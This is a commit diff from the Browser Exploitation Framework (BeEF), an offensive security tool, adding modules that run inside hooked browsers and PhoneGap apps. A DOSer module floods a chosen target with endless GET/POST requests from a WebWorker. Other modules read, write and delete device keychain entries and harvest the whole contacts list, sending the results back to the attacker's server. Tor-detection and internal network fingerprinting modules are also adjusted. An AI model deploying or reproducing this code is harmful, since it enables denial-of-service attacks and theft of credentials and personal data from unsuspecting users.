# See the file 'doc/COPYING' for copying permission
#
beef:
module:
doser:
enable: true
category: "Network"
name: "DOSer"
description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run."
authors: ["antisnatchor"]
target:
working: ["ALL"]

26
modules/network/DOSer/module.rb Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Doser < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
end
def self.options
return [
{'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
{'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
{'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
{'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end

45
modules/network/DOSer/worker.js Normal file
View File

@@ -0,0 +1,45 @@
var url = "";
var delay = 0;
var method = "";
var post_data = "";
var counter = 0;
onmessage = function (oEvent) {
url = oEvent.data['url'];
delay = oEvent.data['delay'];
method = oEvent.data['method'];
post_data = oEvent.data['post_data'];
doRequest();
};
function noCache(u){
var result = "";
if(u.indexOf("?") > 0){
result = "&" + Date.now() + Math.random();
}else{
result = "?" + Date.now() + Math.random();
}
return result;
}
function doRequest(){
setInterval(function(){
var xhr = new XMLHttpRequest();
xhr.open(method, url + noCache(url));
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");
if(method == "POST"){
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(post_data);
}else{
xhr.send(null);
}
counter++;
},delay);
setInterval(function(){
postMessage("Requests sent: " + counter);
},10000);
}

4
modules/network/detect_tor/command.js
View File

@@ -14,7 +14,9 @@ beef.execute(function() {
img.setAttribute("style","visibility:hidden"); img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0"); img.setAttribute("width","0");
img.setAttribute("height","0"); img.setAttribute("height","0");
img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif'; //img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
//img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg'
img.src = '<%= @tor_resource %>';
img.id = 'torimg'; img.id = 'torimg';
img.setAttribute("attr","start"); img.setAttribute("attr","start");
img.onerror = function() { img.onerror = function() {

1
modules/network/detect_tor/module.rb
View File

@@ -7,6 +7,7 @@ class Detect_tor < BeEF::Core::Command
def self.options def self.options
return [ return [
{'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
{'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'} {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
] ]
end end

4
modules/network/internal_network_fingerprinting/command.js
View File

@@ -219,7 +219,7 @@ beef.execute(function() {
for(var u=0; u < urls.length; u++) { for(var u=0; u < urls.length; u++) {
if(!urls[u][3] && ports != null){ // use default port if(!urls[u][3] && ports != null){ // use default port
var img = new Image; var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u; img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4]; img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
} else { // iterate to all the specified ports } else { // iterate to all the specified ports
for(p=0;p<ports.length;p++){ for(p=0;p<ports.length;p++){
var img = new Image; var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]"); beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u; img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4]; img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }

3
modules/phonegap/phonegap_detect/command.js
View File

@@ -17,7 +17,8 @@ beef.execute(function() {
+ " cordova api: " + device.cordova + " cordova api: " + device.cordova
+ " platform: " + device.platform + " platform: " + device.platform
+ " uuid: " + device.uuid + " uuid: " + device.uuid
+ " version: " + device.version; + " version: " + device.version
+ " model: " + device.model;
} catch(e) { } catch(e) {
phonegap_details = "unable to detect phonegap"; phonegap_details = "unable to detect phonegap";
} }

2
modules/phonegap/phonegap_geo_locate/command.js
View File

@@ -27,7 +27,7 @@ beef.execute(function() {
// onError Callback receives a PositionError object // onError Callback receives a PositionError object
// //
function onError(error) { function onError(error) {
console.log('code: ' + error.code + '\n' + beef.debug('code: ' + error.code + '\n' +
'message: ' + error.message + '\n'); 'message: ' + error.message + '\n');
} }

34
modules/phonegap/phonegap_globalization_status/command.js Normal file
View File

@@ -0,0 +1,34 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_globalization_status
//
beef.execute(function() {
var result = '';
navigator.globalization.getPreferredLanguage(
function (language) {
result = 'language: ' + language.value + '\n';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
},
function () {
result = 'language: ' + 'fail\n';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
);
navigator.globalization.getLocaleName(
function (locale) {
result = 'locale: ' + locale.value + '\n';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
},
function () {
result = 'locale: ' + 'fail\n';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
);
});

17
modules/phonegap/phonegap_globalization_status/config.yaml Normal file
View File

@@ -0,0 +1,17 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_globalization_status
#
beef:
module:
phonegap_globalization_status:
enable: true
category: "Phonegap"
name: "Globalization Status"
description: "Examine device local settings"
authors: ["staregate"]
target:
working: ["All"]

15
modules/phonegap/phonegap_globalization_status/module.rb Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# // Phonegap_globalization_status
class Phonegap_globalization_status < BeEF::Core::Command
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

82
modules/phonegap/phonegap_keychain/command.js Normal file
View File

@@ -0,0 +1,82 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_keychain
//
beef.execute(function() {
var servicename = "<%== @servicename %>";
var key = "<%== @key %>";
var value = "<%== @value %>";
var action = "<%== @action %>";
var result = '';
var kc = '';
try {
kc = cordova.require("cordova/plugin/keychain");
} catch (err) {
result = 'Unable to access keychain plugin';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
function onGet()
{
var win = function(value) {
result = result + "GET SUCCESS - Key: " + key + " Value: " + value;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
var fail = function(error) {
result = result + "GET FAIL - Key: " + key + " Error: " + error;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
kc.getForKey(win, fail, key, servicename);
}
function onSet()
{
var win = function() {
result = result + "SET SUCCESS - Key: " + key;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
var fail = function(error) {
result = result + "SET FAIL - Key: " + key + " Error: " + error;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
kc.setForKey(win, fail, key, servicename, value);
}
function onRemove()
{
var win = function() {
result = result + "REMOVE SUCCESS - Key: " + key;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
var fail = function(error) {
result = result + "REMOVE FAIL - Key: " + key + " Error: " + error;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
kc.removeForKey(win, fail, key, servicename);
}
if (kc !== undefined) {
switch(action) {
case 'Read':
onGet();
break;
case 'CreateUpdate':
onSet();
break;
case 'Delete':
onRemove();
break;
}
}
});

17
modules/phonegap/phonegap_keychain/config.yaml Normal file
View File

@@ -0,0 +1,17 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_keychain
#
beef:
module:
phonegap_keychain:
enable: true
category: "Phonegap"
name: "Keychain"
description: "Read/CreateUpdate/Delete Keychain Elements"
authors: ["staregate"]
target:
working: ["All"]

53
modules/phonegap/phonegap_keychain/module.rb Normal file
View File

@@ -0,0 +1,53 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_keychain
#
class Phonegap_keychain < BeEF::Core::Command
def self.options
return [{
'name' => 'servicename',
'description' => 'Service name',
'ui_label'=>'Service name',
'value' => 'ServiceNameTest',
'width' => '300px'
},{
'name' => 'key',
'description' => 'Key',
'ui_label'=>'Key',
'value' => 'TestKey',
'width' => '300px'
},{
'name' => 'value',
'description' => 'Value',
'ui_label'=>'Value',
'value' => 'TestValue',
'width' => '100px'
},{
'name' => 'action',
'type' => 'combobox',
'ui_label' => 'Action Type',
'store_type' => 'arraystore',
'store_fields' => ['action'],
'store_data' => [['Read'],['CreateUpdate'],['Delete']],
'valueField' => 'action',
'value' => 'CreateUpdate',
editable: false,
'displayField' => 'action',
'mode' => 'local',
'autoWidth' => true
}]
end
def callback
content = {}
content['Result'] = @datastore['result']
save content
end
end

43
modules/phonegap/phonegap_list_contacts/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// phonegap_list_contacts
//
beef.execute(function() {
var result = '';
function onSuccess(contacts) {
for (var i=0; i<contacts.length; i++) {
result = contacts[i].displayName;
for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
result = result + ' #:' + contacts[i].phoneNumbers[j].value;
}
for (var j=0; j<contacts[i].emails.length; j++) {
result = result + ' @:' + contacts[i].emails[j].value;
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
};
function onError(contactError) {
result = 'fail';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
};
var options = new ContactFindOptions();
options.filter="";
options.multiple=true;
var fields = ["displayName", "phoneNumbers", "emails"];
navigator.contacts.find(fields, onSuccess, onError, options);
});

Some files were not shown because too many files have changed in this diff Show More